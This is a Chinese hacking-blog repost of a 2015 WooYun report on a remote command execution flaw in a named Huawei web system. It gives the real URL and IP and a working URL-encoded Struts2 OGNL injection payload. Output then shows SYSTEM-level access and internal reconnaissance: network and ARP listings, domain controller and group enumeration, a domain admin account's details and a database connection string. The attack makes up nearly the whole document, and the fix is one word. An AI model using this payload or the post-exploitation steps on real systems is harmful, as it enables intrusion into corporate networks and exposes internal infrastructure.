记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络)

2015-12-12 03:00

#1 漏洞服务器

http://wdt-mx.huawei.com/sdtrp/project.action

http://119.145.15.78/sdtrp/project.action

漏洞证明:

#2 exp

http://wdt-mx.huawei.com

code 区域
http://119.145.15.78/sdtrp/project.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D



D:\WEB_Server\apache-tomcat-6.0.44\webapps\sdtrp\



whoami

code 区域
nt authority\system





code 区域
ipconfig /all



Windows IP Configuration



Host Name . . . . . . . . . . . . : DGGWDTRP01-TGE

Primary Dns Suffix . . . . . . . : china.huawei.com





code 区域
arp -a



Interface: 10.88.178.105 --- 0xc

Internet Address Physical Address Type

10.88.178.1 00-00-5e-00-01-b2 dynamic

10.88.178.2 f8-4a-bf-5c-1d-0e dynamic

10.88.178.3 f8-4a-bf-5c-1b-fe dynamic

10.88.178.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.252 01-00-5e-00-00-fc static

239.255.255.250 01-00-5e-7f-ff-fa static



Interface: 10.88.72.91 --- 0xe

Internet Address Physical Address Type

10.88.72.1 00-00-5e-00-01-48 dynamic

10.88.72.2 f8-4a-bf-5c-1d-0d dynamic

10.88.72.3 f8-4a-bf-5c-1b-fd dynamic

10.88.72.5 00-25-9e-b0-db-44 dynamic

10.88.72.255 ff-ff-ff-ff-ff-ff static

224.0.0.22 01-00-5e-00-00-16 static

224.0.0.252 01-00-5e-00-00-fc static

239.255.255.250 01-00-5e-7f-ff-fa static





# 在域环境内,可内网渗透,影响非常大

code 区域
net time /domain

Current time at \\LGGAD41-DC.china.huawei.com is 2015/10/27 16:52:34





code 区域
Pinging LGGAD39-DC.china.huawei.com [10.72.135.58] with 32 bytes of data

Pinging uniportal.huawei.com [10.82.55.193] with 32 bytes of data:

Pinging mail.huawei.com [10.72.61.76] with 32 bytes of data:





域环境内:光域控制器都几百台,几十万人不是盖的

net group "Domain controllers" /domain

code 区域
The request will be processed at a domain controller for domain china.huawei.com.



Group name Domain Controllers

Comment óò?D?ùóDóò?????÷



Members



-------------------------------------------------------------------------------

mask 区域
*****$              BLR*****

*****$ BRA*****

*****$ CGK*****

*****$ DFW*****

*****$ DGG*****

*****$ DGG*****

*****$ HGH*****

*****$ HKG*****

*****$ ISB*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LGG*****

*****$ LHR*****

*****$ LOS*****

*****$ MSC*****

*****$ NKG*****

*****$ NKG*****

*****$ NKG*****

*****$ NKG*****

*****$ PEK*****

*****$ RUH*****

*****$ SIA*****

*****$ SJC*****

*****$ SZX*****

*****$ SZX*****

*****$ SZX*****

*****D02-DC$ *****


YYZAD02-DC$
The command completed successfully.





code 区域
The request will be processed at a domain controller for domain china.huawei.com.



Group name IT-ITPL-DC-CD-w

Comment 云数据中心安全解决方案部



Members



-------------------------------------------------------------------------------

mask 区域
*****               d00*****

***** h00*****

***** h00*****

***** j00*****

***** l00*****

***** l00*****

***** l00*****

***** l00*****

***** o00*****

***** r90*****

***** s00*****

***** w00*****

***** w00*****

***** x00*****

***** y00*****

***** y90*****

***** z00*****

***** z00*****

*****0359515 *****


The command completed successfully.



# 终极BOSS

code 区域
The request will be processed at a domain controller for domain china.huawei.com.



User name china-admin

Full Name

Comment 管理计算机(域)的内置帐户

User's comment

Country code 000 (System Default)

Account active Yes

Account expires Never



Password last set 2015/10/17 16:04:55

Password expires Never

Password changeable 2015/10/17 16:04:55

Password required Yes

User may change password Yes



Workstations allowed All

Logon script

User profile

Home directory

Last logon Never



Logon hours allowed All



Local Group Memberships *Administrators *MomAdministrators

*X86-ADMIN1 *X86-ADMIN2

*X86-ADMIN3

Global Group memberships *MOMadmins *Domain Admins

*Domain Users *Group Policy Creator

The command completed successfully.





# 审计监控系统的数据库

code 区域
var strADOConn="Provider=sqloledb;Data Source=szxmng02-nt.huawei.com;User ID=nt_task_monitor;Password=********;Network Library=dbmssocn";

var oADOConn,oADOCommand,oADORecord;

var strServer,strTask,strStatus,strADOCommand;

var oArgs;

var iAffected;



修复方案:

# 更新

知识来源: www.wooyun.org/bugs/wooyun-2015-0149850

阅读:207384 | 评论:0 | 标签:防火墙 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“华为某系统存在远程命令执行漏洞(可穿透边界防火墙进入生产网络)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云